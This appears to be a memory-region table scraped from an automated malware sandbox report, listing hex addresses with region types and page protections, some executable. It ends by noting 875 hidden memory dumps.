|
heap default
|
page read and write
|
|
|
|
3699000
|
unkown
|
page read and write
|
|
|
|
3683000
|
unkown
|
page read and write
|
|
|
|
3B3D000
|
unkown
|
page read and write
|
|
|
|
40000
|
unkown image
|
page readonly
|
|
|
|
D0000
|
unkown image
|
page readonly
|
|
|
|
2300000
|
heap private
|
page read and write
|
|
|
|
2D8000
|
heap default
|
page read and write
|
|
|
|
30FF000
|
unkown
|
page read and write
|
|
|
|
39D6000
|
unkown
|
page read and write
|
|
|
|
2FCF000
|
unkown
|
page read and write
|
|
|
|
1B7DB000
|
unkown
|
page read and write
|
|
|
|
7FF001A0000
|
unkown
|
page read and write
|
|
|
|
444000
|
heap private
|
page read and write
|
|
|
|
1C5D0000
|
heap private
|
page read and write
|
|
|
|
372D000
|
unkown
|
page read and write
|
|
|
|
2150000
|
heap private
|
page read and write
|
|
|
|
3A15000
|
unkown
|
page read and write
|
|
|
|
470000
|
heap private
|
page read and write
|
|
|
|
1B90000
|
unkown image
|
page readonly
|
|
|
|
7FFFFFB2000
|
unkown image
|
page readonly
|
|
|
|
2FB0000
|
unkown
|
page read and write
|
|
|
|
27A0000
|
unkown
|
page read and write
|
|
|
|
540000
|
unkown image
|
page readonly
|
|
|
|
307F000
|
unkown
|
page read and write
|
|
|
|
200B000
|
heap private
|
page read and write
|
|
|
|
2A00000
|
unkown
|
page read and write
|
|
|
|
2AC0000
|
unkown image
|
page readonly
|
|
|
|
7FFFFFD0000
|
unkown image
|
page readonly
|
|
|
|
7FF00210000
|
unkown
|
page read and write
|
|
|
|
2D7F000
|
unkown
|
page read and write
|
|
|
|
330000
|
unkown image
|
page readonly
|
|
|
|
7FF00250000
|
unkown
|
page execute and read and write
|
|
|
|
7FFFFFD0000
|
unkown image
|
page readonly
|
|
|
|
441000
|
heap default
|
page read and write
|
|
|
|
27A0000
|
unkown
|
page read and write
|
|
|
|
340000
|
heap private
|
page read and write
|
|
|
|
29FF000
|
unkown
|
page read and write
|
|
|
|
388000
|
heap default
|
page read and write
|
|
|
|
15F000
|
unkown
|
page read and write
|
|
|
|
E8000
|
unkown
|
page read and write
|
|
|
|
5F0000
|
heap private
|
page read and write
|
|
|
|
3018000
|
unkown
|
page read and write
|
|
|
|
2A7A000
|
heap private
|
page execute and read and write
|
|
|
|
1CB73000
|
heap private
|
page read and write
|
|
|
|
7EFE0000
|
unkown image
|
page readonly
|
|
|
|
306F000
|
unkown
|
page read and write
|
|
|
|
3219000
|
unkown
|
page read and write
|
|
|
|
31A1000
|
unkown
|
page read and write
|
|
|
|
20000
|
unkown image
|
page readonly
|
|
|
|
7FF00270000
|
unkown
|
page execute and read and write
|
|
|
|
372A000
|
unkown
|
page read and write
|
|
|
|
7FFFFFC2000
|
unkown image
|
page readonly
|
|
|
|
36BC000
|
unkown
|
page read and write
|
|
|
|
34C0000
|
unkown
|
page read and write
|
|
|
|
30FB000
|
unkown
|
page read and write
|
|
|
|
3A01000
|
unkown
|
page read and write
|
|
|
|
2B2A000
|
unkown
|
page read and write
|
|
|
|
7FFFFFC2000
|
unkown image
|
page readonly
|
|
|
|
2FF1000
|
unkown
|
page read and write
|
|
|
|
3A56000
|
unkown
|
page read and write
|
|
|
|
3343000
|
unkown
|
page read and write
|
|
|
|
160000
|
unkown image
|
page read and write
|
|
|
|
3081000
|
unkown
|
page read and write
|
|
|
|
7FFFFFC2000
|
unkown image
|
page readonly
|
|
|
|
1D6000
|
unkown
|
page read and write
|
|
|
|
30C5000
|
unkown
|
page read and write
|
|
|
|
3A68000
|
unkown
|
page read and write
|
|
|
|
7FFFFFB2000
|
unkown image
|
page readonly
|
|
|
|
3A39000
|
unkown
|
page read and write
|
|
|
|
3D0000
|
heap private
|
page read and write
|
|
|
|
30AE000
|
unkown
|
page read and write
|
|
|
|
7FFFFFB0000
|
unkown image
|
page readonly
|
|
|
|
7FFFFFB2000
|
unkown image
|
page readonly
|
|
|
|
1D57000
|
unkown image
|
page readonly
|
|
|
|
3B0000
|
unkown image
|
page readonly
|
|
|
|
50000
|
unkown image
|
page readonly
|
|
|
|
27A0000
|
unkown
|
page read and write
|
|
|
|
2F73000
|
unkown
|
page read and write
|
|
|
|
2FE1000
|
unkown
|
page read and write
|
|
|
|
36BF000
|
unkown
|
page read and write
|
|
|
|
480000
|
unkown
|
page read and write
|
|
|
|
450000
|
unkown image
|
page readonly
|
|
|
|
1CBE0000
|
unkown image
|
page readonly
|
|
|
|
10000
|
unkown image
|
page read and write
|
|
|
|
2250000
|
unkown
|
page read and write
|
|
|
|
7FFFFFD0000
|
unkown image
|
page readonly
|
|
|
|
7FF001F0000
|
unkown
|
page read and write
|
|
|
|
7FF00160000
|
unkown
|
page execute and read and write
|
|
|
|
27A0000
|
unkown
|
page read and write
|
|
|
|
170000
|
unkown
|
page read and write
|
|
|
|
7FF00180000
|
unkown
|
page read and write
|
|
|
|
1EF0000
|
unkown image
|
page readonly
|
|
|
|
3FD0000
|
unkown image
|
page readonly
|
|
|
|
27A0000
|
unkown
|
page read and write
|
|
|
|
20000
|
unkown image
|
page readonly
|
|
|
|
E6000
|
unkown
|
page read and write
|
|
|
|
3686000
|
unkown
|
page read and write
|
|
|
|
36A9000
|
unkown
|
page read and write
|
|
|
|
361F000
|
unkown
|
page read and write
|
|
|
|
20000
|
unkown image
|
page readonly
|
|
|
|
3420000
|
unkown
|
page read and write
|
|
|
|
3A5B000
|
unkown
|
page read and write
|
|
|
|
1FD5000
|
heap private
|
page read and write
|
|
|
|
306B000
|
unkown
|
page read and write
|
|
|
|
3A19000
|
unkown
|
page read and write
|
|
|
|
1D20000
|
heap private
|
page execute and read and write
|
|
|
|
38F8000
|
unkown
|
page read and write
|
|
|
|
39A5000
|
unkown
|
page read and write
|
|
|
|
14A000
|
unkown
|
page read and write
|
|
|
|
2250000
|
unkown
|
page read and write
|
|
|
|
3B1000
|
heap default
|
page read and write
|
|
|
|
1C40000
|
unkown image
|
page readonly
|
|
|
|
3078000
|
unkown
|
page read and write
|
|
|
|
36A6000
|
unkown
|
page read and write
|
|
|
|
116000
|
unkown
|
page read and write
|
|
|
|
2250000
|
unkown
|
page read and write
|
|
|
|
1B550000
|
unkown
|
page read and write
|
|
|
|
321E000
|
unkown
|
page read and write
|
|
|
|
3A8E000
|
unkown
|
page read and write
|
|
|
|
3A26000
|
unkown
|
page read and write
|
|
|
|
180000
|
unkown image
|
page readonly
|
|
|
|
D0000
|
unkown image
|
page readonly
|
|
|
|
1C50E000
|
unkown
|
page read and write
|
|
|
|
7FF001C0000
|
unkown
|
page read and write
|
|
|
|
2165000
|
heap private
|
page read and write
|
|
|
|
3241000
|
unkown
|
page read and write
|
|
|
|
147000
|
heap default
|
page read and write
|
|
|
|
3606000
|
unkown
|
page read and write
|
|
|
|
3008000
|
unkown
|
page read and write
|
|
|
|
27A0000
|
unkown
|
page read and write
|
|
|
|
7FFFFFC0000
|
unkown image
|
page readonly
|
|
|
|
1EE000
|
heap default
|
page read and write
|
|
|
|
2D0000
|
heap default
|
page read and write
|
|
|
|
190000
|
unkown image
|
page readonly
|
|
|
|
359000
|
heap default
|
page read and write
|
|
|
|
2D81000
|
unkown
|
page read and write
|
|
|
|
2250000
|
unkown
|
page read and write
|
|
|
|
2FCB000
|
unkown
|
page read and write
|
|
|
|
39FB000
|
unkown
|
page read and write
|
|
|
|
1F70000
|
heap private
|
page execute and read and write
|
|
|
|
1A4000
|
heap private
|
page read and write
|
|
|
|
3989000
|
unkown
|
page read and write
|
|
|
|
7FFFFFD0000
|
unkown image
|
page readonly
|
|
|
|
398F000
|
unkown
|
page read and write
|
|
|
|
670000
|
unkown image
|
page readonly
|
|
|
|
12D0C000
|
unkown
|
page read and write
|
|
|
|
7FF00240000
|
unkown
|
page execute and read and write
|
|
|
|
60000
|
unkown image
|
page read and write
|
|
|
|
7FFFFFB0000
|
unkown image
|
page readonly
|
|
|
|
2CF5000
|
heap private
|
page read and write
|
|
|
|
21B000
|
unkown
|
page read and write
|
|
|
|
1B5BD000
|
unkown
|
page read and write
|
|
|
|
560000
|
unkown image
|
page readonly
|
|
|
|
7FFFFFD0000
|
unkown image
|
page readonly
|
|
|
|
7FFFFFC2000
|
unkown image
|
page readonly
|
|
|
|
4E0000
|
unkown image
|
page readonly
|
|
|
|
3CBF000
|
unkown
|
page read and write
|
|
|
|
D0000
|
unkown image
|
page read and write
|
|
|
|
30000
|
unkown image
|
page readonly
|
|
|
|
35DD000
|
unkown
|
page read and write
|
|
|
|
375000
|
heap default
|
page read and write
|
|
|
|
7EFE0000
|
unkown image
|
page readonly
|
|
|
|
E0000
|
unkown
|
page read and write
|
|
|
|
165000
|
unkown
|
page read and write
|
|
|
|
3A9D000
|
unkown
|
page read and write
|
|
|
|
151000
|
unkown
|
page read and write
|
|
|
|
312B000
|
unkown
|
page read and write
|
|
|
|
2FCC000
|
unkown
|
page read and write
|
|
|
|
5F0000
|
unkown image
|
page readonly
|
|
|
|
7FFFFFB2000
|
unkown image
|
page readonly
|
|
|
|
7FFFFFB2000
|
unkown image
|
page readonly
|
|
|
|
1CDC7000
|
unkown image
|
page readonly
|
|
|
|
2D18000
|
unkown
|
page read and write
|
|
|
|
5E0000
|
unkown image
|
page readonly
|
|
|
|
7FF00190000
|
unkown
|
page execute and read and write
|
|
|
|
3055000
|
unkown
|
page read and write
|
|
|
|
312E000
|
unkown
|
page read and write
|
|
|
|
1B7A5000
|
unkown
|
page read and write
|
|
|
|
13F000
|
unkown
|
page read and write
|
|
|
|
7FF00200000
|
unkown
|
page execute and read and write
|
|
|
|
2F32000
|
unkown
|
page read and write
|
|
|
|
12F30000
|
unkown
|
page read and write
|
|
|
|
7FFFFF10000
|
unkown
|
page execute and read and write
|
|
|
|
EC000
|
unkown
|
page read and write
|
|
|
|
7FFFFFB2000
|
unkown image
|
page readonly
|
|
|
|
15F000
|
unkown
|
page read and write
|
|
|
|
6A0000
|
unkown image
|
page readonly
|
|
|
|
165000
|
unkown
|
page read and write
|
|
|
|
3693000
|
unkown
|
page read and write
|
|
|
|
7FFFFFC2000
|
unkown image
|
page readonly
|
|
|
|
100000
|
unkown image
|
page readonly
|
|
|
|
3013000
|
unkown
|
page read and write
|
|
|
|
40000
|
unkown image
|
page readonly
|
|
|
|
7FF00052000
|
unkown
|
page execute and read and write
|
|
|
|
7FF00280000
|
unkown
|
page execute and read and write
|
|
|
|
35DA000
|
unkown
|
page read and write
|
|
|
|
7FF00042000
|
unkown
|
page execute and read and write
|
|
|
|
7FFFFFC0000
|
unkown image
|
page readonly
|
|
|
|
3049000
|
unkown
|
page read and write
|
|
|
|
7FFFFFC2000
|
unkown image
|
page readonly
|
|
|
|
1B8A0000
|
unkown
|
page read and write
|
|
|
|
1B802000
|
unkown
|
page read and write
|
|
|
|
2B26000
|
unkown
|
page read and write
|
|
|
|
2A4A000
|
unkown
|
page read and write
|
|
|
|
2250000
|
unkown
|
page read and write
|
|
|
|
30D0000
|
unkown
|
page read and write
|
|
|
|
2FD2000
|
unkown
|
page read and write
|
|
|
|
2250000
|
unkown
|
page read and write
|
|
|
|
2B50000
|
unkown
|
page read and write
|
|
|
|
7FFFFFB0000
|
unkown image
|
page readonly
|
|
|
|
145000
|
unkown
|
page read and write
|
|
|
|
7FF00217000
|
unkown
|
page read and write
|
|
|
|
2110000
|
heap private
|
page read and write
|
|
|
|
7FF00220000
|
unkown
|
page execute and read and write
|
|
|
|
358F000
|
unkown
|
page read and write
|
|
|
|
1B5E0000
|
unkown
|
page read and write
|
|
|
|
2900000
|
unkown
|
page read and write
|
|
|
|
5F4000
|
heap private
|
page read and write
|
|
|
|
7FFFFFC2000
|
unkown image
|
page readonly
|
|
|
|
7FFFFFB2000
|
unkown image
|
page readonly
|
|
|
|
460000
|
unkown image
|
page readonly
|
|
|
|
1ECD000
|
unkown
|
page read and write
|
|
|
|
2050000
|
unkown image
|
page readonly
|
|
|
|
460000
|
unkown image
|
page readonly
|
|
|
|
13F000
|
unkown
|
page read and write
|
|
|
|
7FFFFFB2000
|
unkown image
|
page readonly
|
|
|
|
3B2E000
|
unkown
|
page read and write
|
|
|
|
7FFFFFB2000
|
unkown image
|
page readonly
|
|
|
|
2F4E000
|
unkown
|
page read and write
|
|
|
|
30000
|
unkown image
|
page readonly
|
|
|
|
7FFFFFD0000
|
unkown image
|
page readonly
|
|
|
|
1E0000
|
unkown
|
page read and write
|
|
|
|
27A0000
|
unkown
|
page read and write
|
|
|
|
290000
|
heap default
|
page read and write
|
|
|
|
3ABD000
|
unkown
|
page read and write
|
|
|
|
E0000
|
unkown image
|
page read and write
|
|
|
|
7FF002B0000
|
unkown
|
page execute and read and write
|
|
|
|
2350000
|
unkown image
|
page readonly
|
|
|
|
3AB3000
|
unkown
|
page read and write
|
|
|
|
344000
|
heap private
|
page read and write
|
|
|
|
D0000
|
unkown image
|
page readonly
|
|
|
|
34CB000
|
unkown
|
page read and write
|
|
|
|
1CB60000
|
heap private
|
page read and write
|
|
|
|
1F00000
|
heap private
|
page read and write
|
|
|
|
7FF001B0000
|
unkown
|
page read and write
|
|
|
|
27A0000
|
unkown
|
page read and write
|
|
|
|
454000
|
heap private
|
page read and write
|
|
|
|
32EA000
|
unkown
|
page read and write
|
|
|
|
3A3B000
|
unkown
|
page read and write
|
|
|
|
7FF00102000
|
unkown
|
page execute and read and write
|
|
|
|
3121000
|
unkown
|
page read and write
|
|
|
|
28FE000
|
unkown
|
page read and write
|
|
|
|
2255000
|
heap private
|
page read and write
|
|
|
|
12DAC000
|
unkown
|
page read and write
|
|
|
|
1B5B4000
|
unkown
|
page read and write
|
|
|
|
401000
|
heap default
|
page read and write
|
|
|
|
2710000
|
unkown image
|
page readonly
|
|
|
|
313D000
|
unkown
|
page read and write
|
|
|
|
151000
|
unkown
|
page read and write
|
|
|
|
433000
|
heap default
|
page read and write
|
|
|
|
3095000
|
unkown
|
page read and write
|
|
|
|
30ED000
|
unkown
|
page read and write
|
|
|
|
39AB000
|
unkown
|
page read and write
|
|
|
|
3047000
|
unkown
|
page read and write
|
|
|
|
7FFFFFC0000
|
unkown image
|
page readonly
|
|
|
|
3690000
|
unkown
|
page read and write
|
|
|
|
31E8000
|
unkown
|
page read and write
|
|
|
|
7FF00150000
|
unkown
|
page read and write
|
|
|
|
21A0000
|
heap private
|
page read and write
|
|
There are 875 hidden memdumps, click here to show them.